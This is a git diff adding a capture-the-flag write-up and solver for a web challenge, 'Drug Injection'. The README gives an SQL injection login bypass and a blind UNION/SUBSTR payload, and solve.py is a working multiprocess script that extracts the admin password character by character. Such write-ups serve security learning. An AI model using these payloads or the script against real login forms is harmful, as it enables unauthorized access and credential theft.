diff --git a/shunyaCTF-2024/web/drug_injection/README.md b/shunyaCTF-2024/web/drug_injection/README.md new file mode 100644 index 0000000..886327f --- /dev/null +++ b/shunyaCTF-2024/web/drug_injection/README.md @@ -0,0 +1,27 @@ +# Drug Injection + +Domain: Web + +Points: 300 + +Solves: 32 + +### Given information + +> I made a Drug awareness website for my Drug Addict friend as a joke to help him get over his addiction. He kept complaining about not being able to login. He Scored an injection drug. I tried to convince him that he should stop getting High before he tries to login. injections won't always help u to get HIGHer access. He was not satisfied with just a single injection, he wanted to try Double Dose. How do I convince him to stop. Help me spread awareness. + +### Solution + +The login form at `/login.php` was found to be vulnerable to SQL injection with the username `admin` and password `' or 1=1-- -`. Nothing useful was found at the landing page `/welcome.php`. Hence we try to look into the database. + +In case of any error in SQL query all we get is `Login failed. Please check your username and password.` hence this is a blind SQL challenge. We find the flag in the admin's password after using the `SUBSTR` function to extract it character by character using this payload: + +```sql +' UNION SELECT username,1,1,1 FROM users WHERE username='admin' AND substr(password, {}, 1) = '{}'-- - +``` + +[solve.py](solve.py) + +Note: The `LIKE` operator can also be used here but it could cause issues as: +- `_` is a `LIKE` wildcard for any single character and hence presents problems if present in the actual flag +- sqlite3's `LIKE` is case-insensitive diff --git a/shunyaCTF-2024/web/drug_injection/solve.py b/shunyaCTF-2024/web/drug_injection/solve.py new file mode 100644 index 0000000..db988f3 --- /dev/null +++ b/shunyaCTF-2024/web/drug_injection/solve.py @@ -0,0 +1,47 @@ +import requests +import string +import multiprocessing + +SUBSTR_LEN = 1 + + +def trial(cha): + data = { + "username": "admin", + "password": f"' UNION SELECT username,1,1,1 FROM users WHERE username='admin' AND substr(password, {substr_idx}, {SUBSTR_LEN}) = '{cha}'-- -", + } + + response = requests.post("https://ch37242180636.ch.eng.run/login.php", data=data) + if "failed" not in response.text: + # print(dct["flag"], cha, response.text[:50]) + dct["flag"] += cha + # print(response.text) + + +mgr = multiprocessing.Manager() +dct = mgr.dict() +dct["flag"] = "" +dct["flag_old"] = "" + +substr_idx = 1 + +while True: + procs = [] + + for i in string.ascii_letters + string.digits + "{}_": + procs.append(multiprocessing.Process(target=trial, args=(i,))) + + for p in procs: + p.start() + + for p in procs: + p.join() + + print(dct["flag"]) + if dct["flag_old"] == dct["flag"]: + break + else: + dct["flag_old"] = dct["flag"] + + substr_idx += 1 + # break